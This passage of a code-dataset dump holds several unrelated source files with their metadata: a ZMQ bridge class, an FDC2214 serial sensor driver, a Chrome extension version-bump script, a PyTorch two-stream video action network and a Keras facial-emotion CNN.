--------------------------------------------------------------------------\n #\n def start(self):\n\n # the bridge runs in a thread. It is the bridge's owner process'\n # responsibility to ensure the thread is seeing suffient time to perform\n # as needed. Given Python's thread performance (or lack thereof), this\n # basically means that the user of this class should create a separate\n # process instance to host the bridge thread.\n self._term = mt.Event()\n self._bridge_thread = mt.Thread(target=self._bridge_work)\n self._bridge_thread.daemon = True\n self._bridge_thread.start()\n\n self._log.info('started bridge %s', self._uid)\n\n\n # --------------------------------------------------------------------------\n #\n @staticmethod\n def create(cfg):\n\n # NOTE: I'd rather have this as class data than as stack data, but\n # python stumbles over circular imports at that point :/\n # Another option though is to discover and dynamically load\n # components.\n from .pubsub import PubSub\n from .queue import Queue\n\n _btypemap = {'pubsub' : PubSub,\n 'queue' : Queue}\n\n kind = cfg['kind']\n\n if kind not in _btypemap:\n raise ValueError('unknown bridge type (%s)' % kind)\n\n btype = _btypemap[kind]\n bridge = btype(cfg)\n\n return bridge\n\n\n # --------------------------------------------------------------------------\n #\n def stop(self, timeout=None):\n\n self._term.set()\n # self._bridge_thread.join(timeout=timeout)\n self._prof.prof('term', uid=self._uid)\n\n # if timeout is not None:\n # return not self._bridge_thread.is_alive()\n\n\n # --------------------------------------------------------------------------\n #\n @property\n def alive(self):\n return self._bridge_thread.is_alive()\n\n\n# ------------------------------------------------------------------------------\n\n","sub_path":"src/radical/utils/zmq/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216165260","text":"# ===============================================\n# Driver for FDC2214 capacitance to digital module\n# (c) 2017 Mihkel Veske\n# ===============================================\n\nimport serial\nimport time\nimport numpy as np\n\nimport constants as const\nimport tools\n\n#===========================================================\n# USB CDC commands\nWRITE = '36'\nREAD = '37'\nSTREAM_ON = '32'\nSTREAM_OFF = '33'\nFIRMWARE ='4C'\n\n#===========================================================\n# FDC2214 addressing space\nDataMSB_CH0 = '00'\nDataLSB_CH0 = '01'\nDataMSB_CH1 = '02'\nDataLSB_CH1 = '03'\nDataMSB_CH2 = '04'\nDataLSB_CH2 = '05'\nDataMSB_CH3 = '06'\nDataLSB_CH3 = '07'\n\nRcount_CH0 = '08'\nRcount_CH1 = '09'\nRcount_CH2 = '0A'\nRcount_CH3 = '0B'\nOffset_CH0 = '0C'\nOffset_CH1 = '0D'\nOffset_CH2 = '0E'\nOffset_CH3 = '0F'\nSetCount_CH0 = '10'\nSetCount_CH1 = '11'\nSetCount_CH2 = '12'\nSetCount_CH3 = '13'\nClockDiv_CH0 = '14'\nClockDiv_CH1 = '15'\nClockDiv_CH2 = '16'\nClockDiv_CH3 = '17'\nDriveCur_CH0 = '1E'\nDriveCur_CH1 = '1F'\nDriveCur_CH2 = '20'\nDriveCur_CH3 = '21'\n\nStatus = '18'\nErrorConfig = '19'\nConfig = '1A'\nMuxConfig = '1B'\nReset = '1C'\nDevID = '7F'\n\n#===========================================================\n# FDC2214 internal variables\nserial_port = serial.Serial()\n\n#===========================================================\n\n# convert raw measurement data into capacitance\n# sensor capacitance C_sensor = 1 / L*(2*pi*f_sensor)^2 - C \n# and sensor 
\n# read the capacitance in channel 0\ndef read_ch0():\n    [C0, C1, C2, C3] = get_data()\n    return C0\n\n# read the capacitance in channel 1\ndef read_ch1():\n    [C0, C1, C2, C3] = get_data()\n    return C1\n\n# read the capacitance difference between channel 1 and channel 0\ndef read_ch10():\n    [C0, C1, C2, C3] = get_data()\n    return C1 - C0\n    \n# read the capacitance difference between channel 3 and channel 2\ndef read_ch2():\n    [C0, C1, C2, C3] = get_data()\n    return C3 - C2\n    \n# read measured capacitances\ndef get_data():\n    global serial_port\n    \n    send_data = '1000'\n    if (const.PRINT_TX_DATA):\n        print (\"Sent:\", send_data)\n    \n    try:\n        # Read pending input bytes\n        while (serial_port.inWaiting() > 0):\n            serial_port.read(serial_port.inWaiting())\n\n        # Send data\n        serial_port.write(send_data.encode(\"utf-8\"))\n        \n        # wait for the response\n        while (serial_port.inWaiting() < 32): time.sleep(0.1)\n        \n        # read the response\n        response = serial_port.read(serial_port.inWaiting())\n        if (const.PRINT_RESPONSE_DATA):\n            print (\"Response:\", end='')\n            for r in response: print (\" %d\" % r, end='')\n            print()\n        \n        # convert readings in hex string format into integers\n        if len(response) >= 36:\n            return [data2cap(response[0:8]), data2cap(response[9:17]),\n                    data2cap(response[18:26]), data2cap(response[27:35])]\n\n    except serial.SerialException:\n        print (\"Error writing to FDC2214 in\", serial_port.port)\n\n    return [0,0,0,0]\n\n# open serial port and initialise FDC2214 registers\ndef config():\n    global serial_port\n    \n    # open serial port\n    serial_port = tools.get_serial(const.FDC2214_PORT, 115200)\n    #if (not serial_port.isOpen()):\n    #    serial_port.open()\n\n# write data string \ndef write_data(data):\n    global serial_port\n    \n    if (const.PRINT_TX_DATA):\n        print (\"Sent:\", data)\n    \n    try:\n        # Read pending input bytes\n        while (serial_port.inWaiting() > 0):\n            serial_port.read(serial_port.inWaiting())\n\n        # Send data\n        serial_port.write(data.encode(\"utf-8\"))\n        \n        # wait for the response\n        while (serial_port.inWaiting() < 32):\n            time.sleep(0.1)\n        \n        # read the response\n        response = serial_port.read(serial_port.inWaiting())\n        if (const.PRINT_RESPONSE_DATA):\n            print (\"Response:\", end='')\n            for r in response: print (\" %d\" % r, end='')\n            print()\n        return response[8]\n\n    except serial.SerialException:\n        print (\"Error writing to FDC2214 in\", serial_port.port)\n    \n    return 0\n\n# read value from register\ndef read_reg(reg):\n    send_data = READ + reg + '00'\n    return write_data(send_data)\n    \n# write value to register\ndef write_reg(reg, value):\n    send_data = WRITE + reg + value + '00'\n    write_data(send_data)\n","sub_path":"머신러닝 공부/LG_current_detection/science-basement-d2d1d7809855b0fc99c386628562acd3e71757b0/fdc2214.py","file_name":"fdc2214.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"38995249","text":"#!/usr/bin/python\n\nfrom crx_builder.crx_versioner import CrxVersioner\nimport argparse\nimport logging\n
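\n# Usage sketch (illustrative paths): python bump_version.py --app_path ./my_extension \\\n#     --pem_file_location ./key.pem --update_file ./updates.xml\n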
\nlogging.basicConfig(level='INFO')\n\n# Grab the args, which should only be the directory to pack, and the location of the updates file\nparser = argparse.ArgumentParser()\nparser.add_argument('--app_path', type=str, help='Enter the path to the extension', required=True)\nparser.add_argument('--pem_file_location', type=str, help='Enter the path to the pem file', required=True)\nparser.add_argument('--update_file', type=str, help='Enter the path to the update file', required=True)\nargs = parser.parse_args()\n\nversioner = CrxVersioner(\n    args.app_path,\n    args.pem_file_location,\n    args.update_file\n)\n\nversioner.bump_version()\n\n","sub_path":"bump_version.py","file_name":"bump_version.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"88585238","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport torch\nimport torch.nn as nn\nfrom torchvision.models.utils import load_state_dict_from_url\nfrom torch.nn import functional as F\n\n# TODO: like SlowFast, cat the two pathways' avg-pool outputs and run the fc forward together\nmodel_urls = {\n    'r3d_18': 'https://download.pytorch.org/models/r3d_18-b3b3357e.pth',\n    'mc3_18': 'https://download.pytorch.org/models/mc3_18-a90a0ba3.pth',\n    'r2plus1d_18': 'https://download.pytorch.org/models/r2plus1d_18-91a641e6.pth',\n}\n\n\nclass Conv2Plus1D(nn.Sequential):\n\n    def __init__(self,\n                 in_planes,\n                 out_planes,\n                 midplanes,\n                 stride=1,\n                 padding=1):\n        super(Conv2Plus1D, self).__init__(\n            nn.Conv3d(in_planes, midplanes, kernel_size=(1, 3, 3),\n                      stride=(1, stride, stride), padding=(0, padding, padding),\n                      bias=False),\n            nn.BatchNorm3d(midplanes),\n            nn.ReLU(inplace=True),\n            nn.Conv3d(midplanes, out_planes, kernel_size=(3, 1, 1),\n                      stride=(stride, 1, 1), padding=(padding, 0, 0),\n                      bias=False))\n\n    @staticmethod\n    def get_downsample_stride(stride):\n        return (stride, stride, stride)\n\n\nclass BasicConv2d(nn.Module):\n\n    def __init__(self, in_channels, out_channels, **kwargs):\n        super(BasicConv2d, self).__init__()\n        self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n        self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n    def forward(self, x):\n        x = self.conv(x)\n        x = self.bn(x)\n        return F.relu(x, inplace=True)\n\n\nclass InceptionA(nn.Module):\n\n    def __init__(self, in_channels, output_channels, stride, conv_block=None, ):\n        super(InceptionA, self).__init__()\n        if conv_block is None:\n            conv_block = BasicConv2d\n        # the four branches below emit 1 + 4 + 2 + 1 = 8 chunks, i.e. output_channels channels after concatenation\n        channels_chunk = int(output_channels) // 8\n        self.stride = stride\n        self.branch1x1 = conv_block(in_channels, channels_chunk, kernel_size=1, stride=stride)\n\n        self.branch5x5_1 = conv_block(in_channels, channels_chunk, kernel_size=1)\n        self.branch5x5_2 = conv_block(channels_chunk, channels_chunk * 4, kernel_size=5, stride=stride, padding=2)\n\n        self.branch3x3dbl_1 = conv_block(in_channels, channels_chunk, kernel_size=1)\n        self.branch3x3dbl_2 = conv_block(channels_chunk, channels_chunk * 2, kernel_size=3, padding=1)\n        self.branch3x3dbl_3 = conv_block(channels_chunk * 2, channels_chunk * 2, kernel_size=3, stride=stride,\n                                         padding=1)\n\n        self.branch_pool = conv_block(in_channels, channels_chunk, kernel_size=1, stride=stride)\n\n    def _forward(self, x):\n        branch1x1 = self.branch1x1(x)\n\n        branch5x5 = self.branch5x5_1(x)\n        branch5x5 = self.branch5x5_2(branch5x5)\n\n        branch3x3dbl = self.branch3x3dbl_1(x)\n        branch3x3dbl = 
self.branch3x3dbl_2(branch3x3dbl)\n branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)\n\n branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)\n branch_pool = self.branch_pool(branch_pool)\n\n outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]\n return outputs\n\n def forward(self, x):\n outputs = self._forward(x)\n return torch.cat(outputs, 1)\n\n\nclass Timeception(nn.Module):\n '''\n keep temporal scale same\n '''\n\n def __init__(self, in_channels, out_channels, stride):\n super(Timeception, self).__init__()\n self.branch1 = nn.Conv1d(in_channels, out_channels, kernel_size=1, stride=stride)\n self.branch3 = nn.Conv1d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1)\n self.branch5 = nn.Conv1d(in_channels, out_channels, kernel_size=5, stride=stride, padding=2)\n self.conv1 = nn.Conv1d(3 * out_channels, out_channels, kernel_size=1)\n\n def forward(self, x):\n # x (-1,c,t)\n x1 = self.branch1(x)\n x3 = self.branch3(x)\n x5 = self.branch5(x)\n x = torch.cat((x1, x3, x5), dim=1)\n x = self.conv1(x)\n return x\n\n\nclass Conv2Plus1DSpatioalEnhanced(nn.Module):\n\n def __init__(self,\n in_planes,\n out_planes,\n midplanes,\n stride=1,\n padding=1):\n super(Conv2Plus1DSpatioalEnhanced, self).__init__()\n self.inception = InceptionA(in_planes, out_planes, stride=stride, conv_block=BasicConv2d)\n self.bn3 = nn.BatchNorm3d(out_planes)\n self.temp_cov = nn.Conv3d(out_planes, out_planes, kernel_size=(3, 1, 1), stride=(stride, 1, 1),\n padding=(padding, 0, 0), bias=False)\n\n def forward(self, x):\n '''\n :param x: (N, C, T, W, H)\n :return:\n '''\n n, c, t, w, h = x.shape\n x = x.view(-1, c, w, h)\n x = self.inception(x)\n x = x.view(n, x.shape[1], -1, x.shape[2], x.shape[3])\n x = self.bn3(x)\n x = F.relu(x, inplace=True)\n x = self.temp_cov(x)\n return x\n\n @staticmethod\n def get_downsample_stride(stride):\n return (stride, stride, stride)\n\n\nclass Conv2Plus1DTemporalEnhanced(nn.Module):\n\n def __init__(self,\n in_planes,\n out_planes,\n midplanes,\n stride=1,\n padding=1):\n super(Conv2Plus1DTemporalEnhanced, self).__init__()\n self.spatioal_cov = nn.Conv3d(in_planes, out_planes, kernel_size=(1, 3, 3), stride=(1, stride, stride),\n padding=(0, padding, padding), bias=False)\n self.bn3 = nn.BatchNorm3d(out_planes)\n self.timeception = Timeception(out_planes, out_planes, stride)\n\n def forward(self, x):\n '''\n :param x: (B, C, T, W, H)\n :return:\n '''\n x = self.spatioal_cov(x)\n x = self.bn3(x)\n x = F.relu(x, inplace=True)\n b, c, t, w, h = x.shape\n x = x.permute(0, 3, 4, 1, 2) # (None, 7, 7, 1024, 20)\n x = x.contiguous()\n x = x.view(-1, c, t) # (None*7*7, 1024, 20)\n x = self.timeception(x)\n x = x.view(b, w, h, c, -1) # (None, 7, 7, 1024, 20)\n x = x.permute(0, 3, 4, 1, 2) # (None, 1024, 20, 7, 7)\n return x\n\n @staticmethod\n def get_downsample_stride(stride):\n return (stride, stride, stride)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, conv_builder, stride=1, downsample=None):\n midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)\n\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Sequential(\n conv_builder(inplanes, planes, midplanes, stride),\n nn.BatchNorm3d(planes),\n nn.ReLU(inplace=True)\n )\n self.conv2 = nn.Sequential(\n conv_builder(planes, planes, midplanes),\n nn.BatchNorm3d(planes)\n )\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = 
self.conv2(out)\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, conv_builder, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)\n\n # 1x1x1\n self.conv1 = nn.Sequential(\n nn.Conv3d(inplanes, planes, kernel_size=1, bias=False),\n nn.BatchNorm3d(planes),\n nn.ReLU(inplace=True)\n )\n # Second kernel\n self.conv2 = nn.Sequential(\n conv_builder(planes, planes, midplanes, stride),\n nn.BatchNorm3d(planes),\n nn.ReLU(inplace=True)\n )\n\n # 1x1x1\n self.conv3 = nn.Sequential(\n nn.Conv3d(planes, planes * self.expansion, kernel_size=1, bias=False),\n nn.BatchNorm3d(planes * self.expansion)\n )\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.conv2(out)\n out = self.conv3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass BasicStem(nn.Sequential):\n \"\"\"The default conv-batchnorm-relu stem\n \"\"\"\n\n def __init__(self):\n super(BasicStem, self).__init__(\n nn.Conv3d(3, 64, kernel_size=(3, 7, 7), stride=(1, 2, 2),\n padding=(1, 3, 3), bias=False),\n nn.BatchNorm3d(64),\n nn.ReLU(inplace=True))\n\n\nclass R2Plus1dStem(nn.Sequential):\n \"\"\"R(2+1)D stem is different than the default one as it uses separated 3D convolution\n \"\"\"\n\n def __init__(self):\n super(R2Plus1dStem, self).__init__(\n nn.Conv3d(3, 45, kernel_size=(1, 7, 7),\n stride=(1, 2, 2), padding=(0, 3, 3),\n bias=False),\n nn.BatchNorm3d(45),\n nn.ReLU(inplace=True),\n nn.Conv3d(45, 64, kernel_size=(3, 1, 1),\n stride=(1, 1, 1), padding=(1, 0, 0),\n bias=False),\n nn.BatchNorm3d(64),\n nn.ReLU(inplace=True))\n\n\nclass MSLT(nn.Module):\n\n def __init__(self, pretrained=False, progress=True, block=BasicBlock,\n conv_makers=[Conv2Plus1D] * 3 + [Conv2Plus1DSpatioalEnhanced] * 1,\n layers=[3, 4, 6, 3],\n stem=R2Plus1dStem, input_channels=3, num_classes=400, dropout=0.5,\n zero_init_residual=False):\n \"\"\"Generic resnet video generator.\n\n Args:\n block (nn.Module): resnet building block\n conv_makers (list(functions)): generator function for each layer\n layers (List[int]): number of blocks per layer\n stem (nn.Module, optional): Resnet stem, if None, defaults to conv-bn-relu. Defaults to None.\n num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.\n zero_init_residual (bool, optional): Zero init bottleneck residual BN. 
Defaults to False.\n \"\"\"\n super(MSLT, self).__init__()\n self.inplanes = 64\n\n self.stem = stem()\n\n self.layer1 = self._make_layer(block, conv_makers[0], 64, layers[0], stride=1)\n self.layer2 = self._make_layer(block, conv_makers[1], 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, conv_makers[2], 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, conv_makers[3], 512, layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))\n self.dp = nn.Dropout(dropout)\n self.fc_layer = nn.Linear(512 * block.expansion * 2, num_classes)\n\n self.fusion1 = nn.MaxPool3d(kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n self.fusion2 = nn.MaxPool3d(kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n\n # init weights\n self._initialize_weights()\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls['r2plus1d_18'],\n progress=progress)\n\n model_dict = self.state_dict()\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n self.load_state_dict(pretrained_dict, strict=False)\n\n if input_channels != 3:\n self.stem[0] = nn.Conv3d(input_channels, 45, kernel_size=(1, 7, 7), stride=(1, 2, 2), padding=(0, 3, 3),\n bias=True)\n\n def forward(self, x, stream):\n\n layer3_feature, layer4_feature, feature_vector = stream\n x = self.stem(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n\n x = self.layer3(x)\n x = x + self.fusion1(layer3_feature)\n\n x = self.layer4(x)\n x = x+ self.fusion2(layer4_feature)\n\n x = self.avgpool(x)\n # Flatten the layer to fc\n x = x.flatten(1)\n x = torch.cat([x, feature_vector], dim=1)\n x = self.dp(x)\n x = self.fc_layer(x)\n\n return x\n\n def _make_layer(self, block, conv_builder, planes, blocks, stride=1):\n downsample = None\n\n if stride != 1 or self.inplanes != planes * block.expansion:\n ds_stride = conv_builder.get_downsample_stride(stride)\n downsample = nn.Sequential(\n nn.Conv3d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=ds_stride, bias=False),\n nn.BatchNorm3d(planes * block.expansion)\n )\n layers = []\n layers.append(block(self.inplanes, planes, conv_builder, stride, downsample))\n\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, conv_builder))\n\n return nn.Sequential(*layers)\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n\n\nclass LSMT(nn.Module):\n\n def __init__(self, pretrained=True, progress=True, block=BasicBlock,\n conv_makers=[Conv2Plus1D] * 3 + [Conv2Plus1DTemporalEnhanced] * 1,\n layers=[3, 4, 6, 3],\n stem=R2Plus1dStem, input_channels=3, num_classes=400,\n zero_init_residual=False):\n \"\"\"Generic resnet 
video generator.\n\n Args:\n block (nn.Module): resnet building block\n conv_makers (list(functions)): generator function for each layer\n layers (List[int]): number of blocks per layer\n stem (nn.Module, optional): Resnet stem, if None, defaults to conv-bn-relu. Defaults to None.\n num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.\n zero_init_residual (bool, optional): Zero init bottleneck residual BN. Defaults to False.\n \"\"\"\n super(LSMT, self).__init__()\n self.inplanes = 64\n\n self.stem = stem()\n\n self.layer1 = self._make_layer(block, conv_makers[0], 64, layers[0], stride=1)\n self.layer2 = self._make_layer(block, conv_makers[1], 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, conv_makers[2], 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, conv_makers[3], 512, layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))\n self.fc_layer = nn.Linear(512 * block.expansion, num_classes)\n\n # init weights\n self._initialize_weights()\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls['r2plus1d_18'],\n progress=progress)\n\n model_dict = self.state_dict()\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n self.load_state_dict(pretrained_dict, strict=False)\n\n if input_channels != 3:\n self.stem[0] = nn.Conv3d(input_channels, 45, kernel_size=(1, 7, 7), stride=(1, 2, 2), padding=(0, 3, 3),\n bias=True)\n\n def forward(self, x):\n x = self.stem(x)\n\n x = self.layer1(x)\n layer1_feature = x\n\n x = self.layer2(x)\n layer2_feature = x\n\n x = self.layer3(x)\n layer3_feature = x\n\n x = self.layer4(x)\n layer4_feature = x\n\n x = self.avgpool(x)\n # Flatten the layer to fc\n feature_vector = x.flatten(1)\n # score = self.fc_layer(x)\n\n return layer1_feature, layer2_feature, layer3_feature, layer4_feature, feature_vector\n\n def _make_layer(self, block, conv_builder, planes, blocks, stride=1):\n downsample = None\n\n if stride != 1 or self.inplanes != planes * block.expansion:\n ds_stride = conv_builder.get_downsample_stride(stride)\n downsample = nn.Sequential(\n nn.Conv3d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=ds_stride, bias=False),\n nn.BatchNorm3d(planes * block.expansion)\n )\n layers = []\n layers.append(block(self.inplanes, planes, conv_builder, stride, downsample))\n\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, conv_builder))\n\n return nn.Sequential(*layers)\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n\n\nclass MSTN(nn.Module): # multi-scale spational and temporal network\n def __init__(self, n_classes):\n 
super(MSTN, self).__init__()\n self.mslt = MSLT(num_classes=n_classes, input_channels=3)\n self.lsmt = LSMT(num_classes=n_classes, input_channels=2)\n\n def forward(self, x):\n # x: (iframe, mv)\n iframe, mv = x\n _, _, layer3_feature, layer4_feature, feature_vector = self.lsmt(mv)\n score = self.mslt(iframe, (layer3_feature, layer4_feature, feature_vector))\n return score\n\n\nif __name__ == \"__main__\":\n num_classes = 101\n # mv sample 2x iframe\n iframe = torch.rand(4, 3, 5, 224, 224)\n mv = torch.rand(4, 2, 10, 224, 224)\n # mslt = R2Plus1d(num_classes=101)\n # devices = [torch.device(\"cuda:%d\" % device) for device in [0, 1]]\n # model = torch.nn.DataParallel(mslt, device_ids=[0, 1])\n # model = model.to(devices[0])\n # output = model(iframe)\n # print(output.size())\n #\n mtls = MSTN(n_classes=num_classes)\n devices = [torch.device(\"cuda:%d\" % device) for device in [4, 5]]\n model = torch.nn.DataParallel(mtls, device_ids=[4, 5])\n model = model.to(devices[0])\n output = model((iframe, mv))\n print(output.size())\n","sub_path":"mstn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"614169314","text":"from __future__ import print_function\r\nimport keras\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Activation, Flatten, BatchNormalization, Convolution2D\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport os\r\nfrom keras.models import Sequential\r\nfrom keras.regularizers import l2\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.layers.advanced_activations import ELU\r\nfrom keras.layers.core import Activation, Flatten, Dropout, Dense\r\nfrom keras.optimizers import RMSprop, SGD, Adam\r\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, TensorBoard\r\nfrom keras.losses import categorical_crossentropy\r\nfrom keras import regularizers\r\nfrom keras.regularizers import l1\r\nimport pandas as pd\r\nimport numpy as np\r\nimport csv\r\nimport cv2\r\n\r\nwidth, height = 48, 48\r\nimage_size = (width, height)\r\nnum_features = 64\r\nnum_labels = 7\r\nbatch_size = 64\r\nepochs = 100\r\nMODELPATH = './models/model.h5'\r\n\r\ndef process_csv_file(data):\r\n pixels = data['pixels'].tolist()\r\n width, height = 48, 48\r\n faces = []\r\n for pixel_sequence in pixels:\r\n face = [int(pixel) for pixel in pixel_sequence.split(' ')]\r\n face = np.asarray(face).reshape(width, height)\r\n face = cv2.resize(face.astype('uint8'), image_size)\r\n faces.append(face.astype('float32'))\r\n faces = np.asarray(faces)\r\n faces = np.expand_dims(faces, -1)\r\n emotions = pd.get_dummies(data['emotion']).as_matrix()\r\n return faces, emotions\r\n\r\ndataset_df = pd.read_csv(\"./dataset/fer2013.csv\")\r\n\r\nmask_training = (dataset_df['Usage']==\"Training\")\r\nmask_test = (dataset_df['Usage']==\"PublicTest\")\r\nmask_valid = (dataset_df['Usage']==\"PrivateTest\")\r\n\r\ntrain_raw = dataset_df.loc[mask_training].reset_index(drop=True)\r\ntest_raw = dataset_df.loc[mask_test].reset_index(drop=True)\r\nvalid_raw = dataset_df.loc[mask_valid].reset_index(drop=True)\r\n\r\nX_train, y_train = process_csv_file(train_raw)\r\nX_test, y_test = process_csv_file(test_raw)\r\nX_valid, y_valid = 
process_csv_file(valid_raw)\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(filters=16, kernel_size=(5, 5), padding='same',\r\n name='image_array', input_shape=(width,height,1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=16, kernel_size=(5, 5),\r\n strides=(2, 2), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=32, kernel_size=(5, 5), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=32, kernel_size=(5, 5),\r\n strides=(2, 2), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3),\r\n strides=(2, 2), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=64, kernel_size=(1, 1), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=128, kernel_size=(3, 3),\r\n strides=(2, 2), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=256, kernel_size=(1, 1), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=128, kernel_size=(3, 3),\r\n strides=(2, 2), padding='same'))\r\n\r\nmodel.add(Convolution2D(filters=256, kernel_size=(1, 1), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=num_labels, kernel_size=(3, 3),\r\n strides=(2, 2), padding='same'))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Activation(\"softmax\"))\r\nmodel.summary()\r\n\r\n# # Create the model\r\n# model = Sequential()\r\n# model.add(Conv2D(32, kernel_size=(3, 3), activation='relu',kernel_regularizer=regularizers.l2(0.0001),input_shape=(48,48,1)))\r\n# # model.add(BatchNormalization())\r\n# model.add(Conv2D(64, kernel_size=(3, 3), activation='relu',kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2)))\r\n# model.add(Conv2D(128, kernel_size=(3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n# 